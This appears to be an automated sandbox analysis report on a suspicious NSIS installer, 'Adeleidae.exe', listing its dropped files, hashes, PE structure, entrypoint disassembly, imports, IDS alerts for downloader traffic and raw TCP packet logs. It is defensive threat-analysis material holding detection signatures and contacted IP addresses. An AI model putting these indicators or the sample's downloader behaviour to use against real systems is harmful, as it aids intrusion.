SHA-256:	A54B603B2BEE75BCF8A30C6C4634C3DFA78B512739D0D5FAE84FF2262686E0A8
SHA-512:	C9D1A502B259B93B11850CC8901F15D19F591CE67B0E8268E414A332A5A7C50667F7FB41526C5265EE7735D77F6D3C160C0DE29B84FF87250CAC6D611E1D46CC
Malicious:	false
Preview:	chollers lynett fimreceller opklodset hexagrams carrier mandorla mumblebee..ugudelighedernes ennoblements kluntemikkelen dekretere.hierarchized testosteronet vandrefuglens paasknnelsers eneboerskernes jumping,aflush argosies pinds nonelementary calciner,nul efficacies samkvemsretten isuridae driftsomkostningerne,espier subauriculate skospnders dorere,

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\cellulomonas.irr

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	346239
Entropy (8bit):	1.256262494072881
Encrypted:	false
SSDEEP:	768:qYE4EutdtNCCqpy382u5rGwJOshbFbQlixw8Y6T58VWS1HGuP8kPA7cBBjEaqKJJ:BtZ5iUEABbp5d1eWZK0KUN
MD5:	BFE4500D057A2BCEB674FBE3BF3687B1
SHA1:	547D5412301FC11E8BB858D1B4C34D3457DF0F24
SHA-256:	9AE45133F71521E61777D1A3A507AADB6C3808588D0E7632A02D1EE0EAD48CA9
SHA-512:	F963F860CC7A4BAF89C726D738CA2B93227D77297AFB5BA70533C6E454B5D8DA81725745C97480DF2818D26CEB7F6443D30B0022BEFB3E9FF05DFB248BE0A5FB
Malicious:	false
Preview:	...~........................................................................O.........!.........................K.U........].........................Gz........................................j................\.................."..................N..............................................y.................r.........................2.............C....h..................h..................=......e..7.........~..............G...................................................e..................................2.............................................N....................I*............../..........................................................................w.........................................................y....................z.....................................L........Z.....................................G................................................o............................................'.................................5.........G.....i..........i......

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\eskimologens.for

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	400431
Entropy (8bit):	1.2528029962595542
Encrypted:	false
SSDEEP:	768:NNxZ+39Fm6bVPJacZnq1T2m6o9dla/C1Y5xxD1w/o2ROgMK7vOqj8zumcicsqXxQ:NmE6R3zvZAhiZq+Nm6pLVawSgc8Cke2
MD5:	7B99EB8E7148F8C420E09FB360215B97
SHA1:	0D6B5053DAC5CA692217DBE9B0800316CC0E5C42
SHA-256:	84FBD7F281D8B3631200E264351545FA1DC2C256367B83A2CD0EBEB2E1A884B2
SHA-512:	B09C75B1271086763AB863FB8A755B688E48CA46A97550A651125217C27B9801EE2ED6DE65F912FCE3793E3FBF24063857F81F1473EB21ED76267A435C0AF57B
Malicious:	false
Preview:	.......n...........................................................^.........................P.................................J........................................................................*...............E........................................H...................0.............................2..........................................7..................................................-......................................................A................................................................................}..........v......v..........3..........6..................i..........\|...................$.............h............'.........................y...W.9.....................8.....................................................................6...................X.....................................................6................o....................................................y......[.........b.........................p..................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\lila.bes

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	283523
Entropy (8bit):	1.2517647181496547
Encrypted:	false
SSDEEP:	768:Vp4oNJKrnvbCN/KeYxLJF9VPGsNo8E2FPOd9gkdLGcY3M/C+KLtbEEmDi4YxK8JY:U3nVkUc/9T+47K8
MD5:	1EAEC618F4CEE65603DBC98CC4ACFFD5
SHA1:	7C57A1E9E3E8A87CDAC4279C9CD1F48921AFD3E5
SHA-256:	BAFBD7BA6E116FA4621416AFFA402B5E77BD3EC8A1CD6883B86B2500ED32236F
SHA-512:	4892B80B2F1F3ECC2E3940928F7220B601057B1CB6EADFB2EDDAB1B330966663627C1AE87B3D8C47576A5861422C7906E297C4F11FC18A1DC332559B74B24389
Malicious:	false
Preview:	..............5.................A.....................................M..............................V...........................~..................................................... .......=...6..............................n......l.............w........P....................F..+............-..............w.........1............H......\|.................@..........E..........................................................`......]....................]..........................G...........w...........................o...................../.......................................................a..............V........................................................................w.k................................../............................................J....................p.....................................l..........o....................a.........................RS........................,..S...............l.................................................L.H..............

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\onomatopoeical.kri

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	226967
Entropy (8bit):	1.2523842479629557
Encrypted:	false
SSDEEP:	768:3AGAEvmWSP+6MQhb59DUem6F2X8dzV+Z8+r0aFk7yShqxG9m6VA2fALEOoWU4/yz:rcteBv2Xmd6
MD5:	5E418394A6BDD607FD99936B606B16B6
SHA1:	AA66F3F103B9E6026D17726DE083834957022433
SHA-256:	503C8736545D2B5612D84243FC79FDEAB9DA98ACF6E936D18E5755236EDF79B5
SHA-512:	184528AC2000AE86037E954C3A0CFA45EDD4E0789A4F940F9AC5C6750EFA416BF71FB8533FF3F14C3C746F329FA4B29F998F8080F4D904168A2A175005D04BDD
Malicious:	false
Preview:	.........................._..;...........................].....................................................B............e...m...........(....U.......................................W............................................N.............................................................................................8..............................................................................................R.........$.....'.................i....................................................................b......#............n.............................;p.......g..........X..:.e.............................N........b.0...........P.............s..............................................................................................V......1.............................x............................J....H................X..............)...........................................Q.........................................F..........}.%..................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\pantomimer.sek

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	351531
Entropy (8bit):	1.255004735349448
Encrypted:	false
SSDEEP:	768:vtnDa/EP5kFIQ50d2qgSXrNKj6kg7pqCdYWGcZHmfxNLVMdLTmzCfYCt08fLGL84:B969AOqGVMp9iFwBzg7gnwf
MD5:	4C4AE3CA611575271974D70E3165CA94
SHA1:	B645FF20978B7B3F88F590851CE0ED3E22B9DF03
SHA-256:	CC86D299F6A01B3278E6ABD5DA639588B0B7FBF0043A6BADFEF3DA29320DC762
SHA-512:	F39F08DB7527B8190407B4D4209201261E7C91531CB8CF1BB03EA3AAD86AA913CBEA6B28629F1C5BD69FF51E1BF7A11F4E9393E41FE44062199E2B875BE83FCA
Malicious:	false
Preview:	........................................................................................................................................................A........P.............................~.......................................l.............4............................................1...............s..............K.......m.......................................................;.......z.............s.................K.................-........................T......3.........6............................................U.....:.......~................................l......................=...../.....D...2..........3...p.......................P..................................m......................b..l................K...................................`.........../.....W................#.................!......................................................}...,........@...............g...C..................P..................................(...........6....................W.

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\semianimate.pol

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	dBase IV DBT, block length 2560, next free block index 21, next free block 0, next used block 0
Category:	dropped
Size (bytes):	252461
Entropy (8bit):	1.2493375868406968
Encrypted:	false
SSDEEP:	768:AykHXFrLko/QFYJsdiqVC2S0lkhrBqTu1zfsknvSZ4os5np88nXHosXKHUGR0QrH:GH1/yDPtU0S+kg4n0m6Xzp/1HDaIP
MD5:	010EE4F1EE9C180B89D1C3E930374CBA
SHA1:	BF2033E8D13926314B9EA776AA3FB95B72D6E118
SHA-256:	9F10777AE5FE6CBB11DDDAAC3F5DD7A7F46D7B27D8D1C78BAD1286DDA9602518
SHA-512:	ABEC8E837435B7086D71C13E923D30B095A6411DE7D4B3C1984754896F8993EF93F68B700D034A35E9D8ABEDF48FF33FDC9F02B2B55027042B8F27A602DE774A
Malicious:	false
Preview:	..............?...................D.......\.&..........................N...............................{.....................................G................................o.......(..........\|................................D..............X.......................................................h....................................................................................................0..........g..B........../...................................................................................................)......................................................t.............a..........z...........g......................t...............I...S.............................................~....4.................................................x..................................................................................=.J...................................................................................e............................4.........M................................

C:\Windows\Resources\Nebengeschfter.ini

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.8431390622295662
Encrypted:	false
SSDEEP:	3:TLCJR1EHX0Ctyn:TLA1MUn
MD5:	53898E643BD3E0CA22A462325AD62DA4
SHA1:	E0F08A75FA5219F39E49C1B9F361119905DA7D02
SHA-256:	B947991000AEA669EBFEADFB12DE45121D46AD3DFD02296F373F9BF8CE4F1AFF
SHA-512:	AA17B99A93A04F7BBBB92F34C15921DA80E20592A39B3921F1D3CC59FAE55F66196B2BE4F56716846DAFF041253CB63D7E373B84234D451181C87F1D097FE8CA
Malicious:	false
Preview:	[sprnglrd]..allis=tarsadenitis..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.861129373263845
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Adeleidae.exe
File size:	931'792 bytes
MD5:	9f3c578444b7f35f3d25eadd5695c162
SHA1:	4e06953078fc5119a5d0a13b8b62dd58bf81eac3
SHA256:	d783f362c426661574a149a0bd801223273fe02c26b3d154de21fdb9516caf86
SHA512:	fcc43adf981f07472e2d122b275fd9d5232de7879f8f08de1c04f58d7d30966ec8c99fa3c1d3887e0796552f72dd31e23f083a97696e23ed18dfaf7b8e840444
SSDEEP:	24576:Zbu6fMeizDKw/NVGC11tD6lm7Pytae6/B1Go:tfBizmwl8Ojgm7OjGB1Go
TLSH:	2D152360F344C857D8A115B08D73D85EB8BBFC6A85B0491F663A3A198F73342993B64F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........

File Icon


Icon Hash:	1130233367c3e313

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Verber, O=Verber, L=Golders Green, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	21/03/2024 07:51:13 21/03/2027 07:51:13
Subject Chain	CN=Verber, O=Verber, L=Golders Green, C=GB
Version:	3
Thumbprint MD5:	25997642387F61156DF7EE9D48389EC8
Thumbprint SHA-1:	CDB98F79CBC5D2B7DB2EF723B379A9D66574A1F1
Thumbprint SHA-256:	963A9CF9CC4B7B4BF54C45B034B64BF74723E37D8CD38BF0A86AECB0374B9245
Serial:	01547F132C176729D775546782D9F055B7740CED

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F41A8F327D3h
push ebp
call 00007F41A8F35916h
cmp eax, ebp
je 00007F41A8F327C9h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007F41A8F35893h
push 0040A2ECh
call 00007F41A8F35889h
push 0040A2E0h
call 00007F41A8F3587Fh
push 00000009h
call 00007F41A8F358E4h
push 00000007h
call 00007F41A8F358DDh
mov dword ptr [00434F04h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [00434FB8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h
push 00433F00h
call 00007F41A8F354CAh
call dword ptr [004080A8h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F41A8F354B8h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85c8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x71000	0x1e308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe2ed8	0x8f8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637c	0x6400	83ff228d6dae8dd738eb2f78afbc793f	False	0.672421875	data	6.491609540807675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x147c	0x1600	d9f9b0b330e238260616b62a7a3cac09	False	0.42933238636363635	data	4.973928345594701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	3f2b05c8fbb8b2e4c9c89e93d30e7252	False	0.53125	data	4.133631086111171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x3c000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x71000	0x1e308	0x1e400	24942564d8bf1d8e057f4addfed688e9	False	0.4605258910123967	data	6.06487438837818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x71358	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x716c0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.20474979297290902
RT_ICON	0x81ee8	0x864f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9821423377832068
RT_ICON	0x8a538	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.366804979253112
RT_ICON	0x8cae0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4129924953095685
RT_ICON	0x8db88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5221311475409836
RT_ICON	0x8e510	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_DIALOG	0x8e978	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x8eac0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x8ec00	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x8ed20	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x8ee40	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8ef08	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8ef68	0x5a	data	English	United States	0.7888888888888889
RT_MANIFEST	0x8efc8	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T03:40:43.308716+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49877	142.250.185.78	443	TCP
2024-10-24T03:40:51.748153+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49918	132.226.8.169	80	TCP
2024-10-24T03:40:53.435617+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49918	132.226.8.169	80	TCP
2024-10-24T03:40:54.058663+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49939	188.114.96.3	443	TCP
2024-10-24T03:40:55.466840+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49945	132.226.8.169	80	TCP
2024-10-24T03:40:57.154416+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49961	132.226.8.169	80	TCP
2024-10-24T03:40:57.881354+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49967	188.114.96.3	443	TCP
2024-10-24T03:41:03.181876+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50001	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 03:40:42.037723064 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.037822008 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.039118052 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.052922010 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.052958012 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.899574041 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.899699926 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.900321960 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.900374889 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.948075056 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.948127985 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.948445082 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:42.949739933 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.952765942 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:42.995348930 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:43.308510065 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:43.312716007 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:43.312777996 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:43.312838078 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:43.312886953 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:43.312943935 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:43.313074112 CEST	443	49877	142.250.185.78	192.168.2.4
Oct 24, 2024 03:40:43.313127995 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:43.313168049 CEST	49877	443	192.168.2.4	142.250.185.78
Oct 24, 2024 03:40:43.349014044 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:43.349085093 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:43.349154949 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:43.349344969 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:43.349360943 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:44.200627089 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:44.200813055 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:44.206417084 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:44.206470013 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:44.206729889 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:44.206784010 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:44.207098007 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:44.247361898 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.146384954 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.146456957 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.155076981 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.155169010 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.263268948 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.263453960 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.263453007 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.263525009 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.263566017 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.263591051 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.263605118 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.263660908 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.265496016 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.265556097 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.265587091 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.265640974 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.272089958 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.272155046 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.272171974 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.272368908 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.280227900 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.280411005 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.280472994 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.280540943 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.379981041 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.380135059 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.380201101 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.380201101 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.380270004 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.380336046 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.380367041 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.380615950 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.382184029 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.382355928 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.382417917 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.382493019 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.388910055 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.389095068 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.389158010 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.389239073 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.397217989 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.397373915 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.397409916 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.397480011 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.397517920 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.397543907 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.497757912 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.497855902 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.497916937 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.497997046 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.500718117 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.500935078 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.500997066 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.501066923 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.501241922 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.501286983 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.506532907 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.506731033 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.506793022 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.506906986 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.510464907 CEST	443	49882	142.250.186.161	192.168.2.4
